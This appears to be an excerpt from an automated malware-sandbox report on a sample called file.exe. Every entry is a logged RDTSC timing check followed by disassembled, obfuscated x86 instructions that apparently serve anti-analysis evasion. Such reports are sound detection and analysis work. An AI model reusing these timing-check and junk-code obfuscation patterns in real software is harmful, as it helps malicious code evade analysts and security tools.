            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE266 second address: 6FE282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F377C5325F3h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD8AE second address: 6FD8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD8B4 second address: 6FD8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70015F second address: 700172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F377CE47988h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700172 second address: 7001AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F377C5325ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jbe 00007F377C5325ECh 0x00000011 mov dword ptr [ebp+122D2FF9h], edx 0x00000017 push 00000000h 0x00000019 xor dword ptr [ebp+12489FC6h], eax 0x0000001f push 00000000h 0x00000021 mov esi, 3D9AEF4Ch 0x00000026 push eax 0x00000027 push ecx 0x00000028 pushad 0x00000029 jmp 00007F377C5325EAh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFEF9 second address: 6FFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F377CE47986h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF04 second address: 6FFF1B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F377C5325ECh 0x00000008 jns 00007F377C5325E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF1B second address: 6FFF25 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF25 second address: 6FFF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F377C5325E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF595 second address: 6BF599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF599 second address: 6BF5AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F377C5325ECh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF5AD second address: 6BF5B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705306 second address: 70530A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B01 second address: 706B06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B06 second address: 706B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx ebx, ax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 sub di, 0BC9h 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 or dword ptr [ebp+122D2DB1h], eax 0x00000026 mov eax, dword ptr [ebp+122D1535h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F377C5325E8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 js 00007F377C5325E9h 0x0000004c xor bl, 0000004Fh 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007F377C5325E8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jnl 00007F377C5325E6h 0x00000076 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B83 second address: 706B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708945 second address: 70894B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707AF6 second address: 707AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707AFC second address: 707B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B0C second address: 708B2A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F377CE47988h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F377CE4798Fh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708BCD second address: 708BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708BD1 second address: 708BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709BB1 second address: 709BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BAF1 second address: 70BB0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47999h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CA3D second address: 70CA4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CA4D second address: 70CA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB53 second address: 70CB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F377C5325E6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711A57 second address: 711A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712976 second address: 712980 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED25 second address: 70ED36 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F377CE47988h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FA7C second address: 70FA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FA80 second address: 70FA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711BC8 second address: 711BDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F377C5325EEh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FA86 second address: 70FB11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F377CE47986h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 call 00007F377CE4798Bh 0x00000015 pop ebx 0x00000016 mov dword ptr [ebp+1247E03Eh], ecx 0x0000001c popad 0x0000001d push dword ptr fs:[00000000h] 0x00000024 jo 00007F377CE4798Ch 0x0000002a mov dword ptr [ebp+1246C8C9h], eax 0x00000030 mov dword ptr [ebp+12495C4Bh], edx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bl, 78h 0x0000003f mov eax, dword ptr [ebp+122D025Dh] 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F377CE47988h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov di, dx 0x00000062 add edi, dword ptr [ebp+122D31E1h] 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D331Fh], ebx 0x00000070 mov edi, eax 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jnl 00007F377CE47986h 0x0000007c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71486F second address: 714873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716C64 second address: 716C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7149A8 second address: 714A40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F377C5325F4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jbe 00007F377C5325F1h 0x0000001c or dword ptr [ebp+1247532Ch], esi 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F377C5325E8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D0F0Dh] 0x00000049 or dword ptr [ebp+122D3015h], ebx 0x0000004f push FFFFFFFFh 0x00000051 jmp 00007F377C5325F6h 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F377C5325F1h 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716C6C second address: 716C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE750 second address: 6AE754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D142 second address: 71D152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE4798Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D152 second address: 71D156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACC67 second address: 6ACC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F377CE47986h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720015 second address: 720029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72027F second address: 7202B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F377CE47986h 0x0000000a jmp 00007F377CE4798Ah 0x0000000f jmp 00007F377CE47994h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F377CE4798Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7202B9 second address: 7202BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724C59 second address: 724C6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jl 00007F377CE4798Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724C6B second address: 724C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F377C5325ECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724DE7 second address: 724E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47997h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A426 second address: 72A430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F377C5325E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A430 second address: 72A436 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AE8E second address: 72AE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B1A8 second address: 72B1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B1AF second address: 72B1D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F377C5325E8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F377C5325F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B1D5 second address: 72B1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B32B second address: 72B346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F377C5325F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B346 second address: 72B34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B5B9 second address: 72B605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F377C5325E6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F377C5325F2h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jmp 00007F377C5325F8h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop ebx 0x0000001e jnc 00007F377C5325EEh 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B605 second address: 72B60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E0DC second address: 72E13F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F377C5325F2h 0x00000008 pop edx 0x00000009 jmp 00007F377C5325EAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F377C5325EEh 0x00000019 pop ecx 0x0000001a jmp 00007F377C5325F9h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F377C5325F1h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E13F second address: 72E143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734355 second address: 73435A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A26 second address: 6E33DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F377CE47988h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1D93h], ecx 0x0000002a lea eax, dword ptr [ebp+124997A0h] 0x00000030 mov dword ptr [ebp+122D1D6Dh], edi 0x00000036 push eax 0x00000037 jmp 00007F377CE47997h 0x0000003c mov dword ptr [esp], eax 0x0000003f mov dword ptr [ebp+122D1D93h], ecx 0x00000045 call dword ptr [ebp+122D307Eh] 0x0000004b pushad 0x0000004c jp 00007F377CE4798Ah 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9B0F second address: 6F9B15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA04A second address: 6FA064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F377CE47991h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA0E7 second address: 6FA0ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA0ED second address: 6FA145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F377CE47994h 0x00000008 jne 00007F377CE47986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F377CE47992h 0x00000018 jmp 00007F377CE4798Eh 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f mov dword ptr [ebp+122D3319h], ecx 0x00000025 nop 0x00000026 pushad 0x00000027 push edi 0x00000028 jl 00007F377CE47986h 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA145 second address: 6FA149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA24F second address: 6FA285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 jmp 00007F377CE4798Bh 0x0000000d mov eax, dword ptr [eax] 0x0000000f jl 00007F377CE479ABh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F377CE47999h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA285 second address: 6FA289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA4CA second address: 6FA4DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F377CE4798Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA93D second address: 6FA94A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA94A second address: 6FA950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAB86 second address: 6FAC20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F377C5325E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, 787D3DC0h 0x00000014 lea eax, dword ptr [ebp+124997E4h] 0x0000001a jmp 00007F377C5325F7h 0x0000001f mov ch, bl 0x00000021 nop 0x00000022 push ebx 0x00000023 jmp 00007F377C5325F9h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a jnp 00007F377C5325EEh 0x00000030 nop 0x00000031 push edx 0x00000032 mov di, 157Fh 0x00000036 pop ecx 0x00000037 lea eax, dword ptr [ebp+124997A0h] 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F377C5325E8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov edi, 7EB5B63Dh 0x0000005c nop 0x0000005d jng 00007F377C5325F4h 0x00000063 push eax 0x00000064 push edx 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAC20 second address: 6FAC31 instructions: 0x00000000 rdtsc 0x00000002 je 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAC31 second address: 6E3E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F377C5325E8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 jmp 00007F377C5325F4h 0x00000026 call dword ptr [ebp+122D1CCCh] 0x0000002c pushad 0x0000002d jmp 00007F377C5325F4h 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 je 00007F377C5325E6h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E0E second address: 734E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E13 second address: 734E20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E20 second address: 734E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E26 second address: 734E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F6B second address: 734F71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F71 second address: 734F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F377C5325E6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F81 second address: 734F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F85 second address: 734F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
